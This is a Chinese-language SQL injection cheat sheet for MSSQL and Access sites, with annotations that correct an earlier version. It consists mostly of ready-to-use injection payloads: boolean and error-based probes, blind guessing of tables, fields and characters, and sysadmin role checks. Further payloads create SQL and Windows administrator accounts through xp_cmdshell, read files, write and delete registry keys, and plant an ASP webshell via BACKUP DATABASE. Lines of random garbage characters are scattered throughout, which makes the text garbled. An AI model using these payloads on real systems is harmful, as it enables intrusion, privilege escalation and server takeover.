1.判断是否有注入 ;and 1=1 ;and 1=2 （两次返回页面不同才可能存在注入，相同则注入点不成立）
2.初步判断是否是mssql ;and user>0 （user 是 nvarchar，与 0 比较时 mssql 报类型转换错误并在错误信息里带出当前用户名；此法依赖页面回显数据库错误，已关闭详细错误的站点看不到）
A"Rzn1/
3.注入参数是字符型时 'and [查询条件] and ''=' （开头的单引号闭合原有字符串，末尾的 ''=' 与页面自带的引号拼成恒真式）
@M4~,O6-
4.搜索时没过滤参数的 'and [查询条件] and '%25'=' （%25 是 URL 编码后的 %，用来保留原 like '%...%' 里的通配符）
Kq`Luf
5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql （sysobjects 在 SQL Server 2005+ 只作为兼容视图保留，新版本也可用 sys.objects）
;and (select count(*) from msysobjects)>0 access （msysobjects 是 Access 的系统表，通常对普通用户没有读权限，报"没有读取数据权限"本身也能说明是 Access）
ac.O#6&
\E.t=XBn
14\%2nE
6.猜表名 ;and (select Count(*) from [表名])>0 （原文写作"猜数据库"，但 from 后面跟的是表名）
{mL/)\
7.猜字段 ;and (select Count(字段名) from 表名)>0
&tZ?%sr
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 表名)>0 （把 0 换成具体数值做二分逼近；不带 order by 时 top 1 取到哪一行并不确定）
MCQ>BP
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0 （mid 的第二个参数是字符位置，逐位递增；>0 换成具体 ascii 值做比较）
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0 （unicode() 返回首字符的 UTF-16 码点，中文等非 ASCII 字符同样适用）
5 LX3.
10.测试权限结构(mssql)
（IS_SRVROLEMEMBER 判断当前登录是否属于指定服务器角色：属于返回 1，不属于返回 0，角色名无效返回 NULL；IS_MEMBER 判断的是当前数据库里的数据库角色。后面的 sp_addsrvrolemember、xp_cmdshell、xp_reg* 写操作都要求 sysadmin）
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--
wt2S[:!p
3N+P~v)T'
,_rarU)[J
11.添加mssql和系统的帐户
（以下都要求当前登录是 sysadmin；sp_addlogin / sp_password 是旧接口，SQL Server 2005+ 对应 create login / alter login。xp_cmdshell 在 2005+ 默认关闭，需先用 sp_configure 打开；net user 以 SQL Server 服务账号身份执行，服务账号不是本机管理员时 /add 和加组都会失败）
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,password,username;-- （参数顺序是 旧密码,新密码,登录名；原文把登录名和密码写反了）
;exec master.dbo.sp_addsrvrolemember username,sysadmin;-- （参数顺序是 登录名,角色名；原文顺序反且缺逗号）
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';-- （原文 /workstations:* 与 /times:all 之间漏了空格）
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
'EZ[aY!);
EE}NA{b
}#'KME4
12.(1)遍历目录
;create table dirs(paths varchar(100), id int) （xp_dirtree 返回 subdirectory、depth 两列，表的列数要对上；超过 100 字符的目录名会让插入失败，必要时放大长度）
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0 （varchar 与 0 比较触发类型转换错误，目录名随错误信息带出）
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>0 （逐个排除已得到的目录；原文末尾的 >) 为笔误）
a|nlmH"l
_9z/>e
+=k?Dp[
(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器（返回 4 列，与 temp 的列数对应）
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容（需要 xp_cmdshell 已开启；输出每行一条记录存入 id 列，再用前面的比较方式逐行取出）
Y~vTFOI
_5`M( ;hL2
K&)a3Z=(.
13.mssql中的存储过程（注册表相关扩展过程；写入、删除注册表需要 sysadmin）
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值
xp_regread 根键,子键,键值名
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回指定键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
常用的值类型有两种：REG_SZ 表示字符型，REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表
xp_regdeletevalue 根键,子键,值名
;exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值
xp_regdeletekey 根键,子键
;exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
~qqtFjlG^
J.nVEqLZ
xlwsZm{V
14.mssql的backup创建webshell（需要对 model 库的 backup database 权限，且 SQL Server 服务账号能写入目标路径；备份文件是二进制，payload 夹在其中，能否被当作 asp 解析取决于 web 服务器是否容忍前后的垃圾字节）
iit`'}+U
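-- Webshell via BACKUP DATABASE: whatever is stored in cmd.str ends up inside the
-- backup file, which is written to a web-served path with an .asp extension.
-- NOTE(review): requires BACKUP DATABASE permission on model, and the SQL Server
-- service account must be able to write c:\l.asp. The backup is a binary file with
-- the payload embedded between header/trailer bytes, so the web server has to
-- tolerate those bytes for the page to be interpreted at all.
use model;
-- image column so the payload bytes are stored verbatim
create table cmd(str image);
-- payload slot; left empty on this page
insert into cmd(str) values ('');
backup database model to disk='c:\l.asp';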
^=W&p%Y(!
TdE_\gEo/R
f.f4<_v'h
15.mssql内置函数
;and (select @@version)>0 获得 SQL Server 版本信息（返回的字符串里同时带有操作系统版本，借助类型转换错误带出）
;and user_name()='dbo' 判断当前连接用户在当前库里是否映射为 dbo（sa、sysadmin 成员和库的 owner 都映射为 dbo，所以成立不等于一定是 sa；严格判断用第 10 节的 IS_SRVROLEMEMBER('sysadmin')）
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库
UF%5/SiVX
3LxJ}>]TO
|X.z|wKT6
16.简洁的webshell（与第 14 节同一手法，只是备份路径换成了网站目录）
,9pi9\S
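-- Same BACKUP DATABASE webshell technique as above, written straight into the
-- web root. Needs BACKUP DATABASE permission on model and write access to the
-- target path for the SQL Server service account; the resulting file is a binary
-- backup with the payload embedded, not a clean .asp.
use model;
-- image column so the payload bytes are stored verbatim
create table cmd(str image);
-- payload slot; left empty on this page
insert into cmd(str) values ('');
backup database model to disk='g:\wwwtest\l.asp';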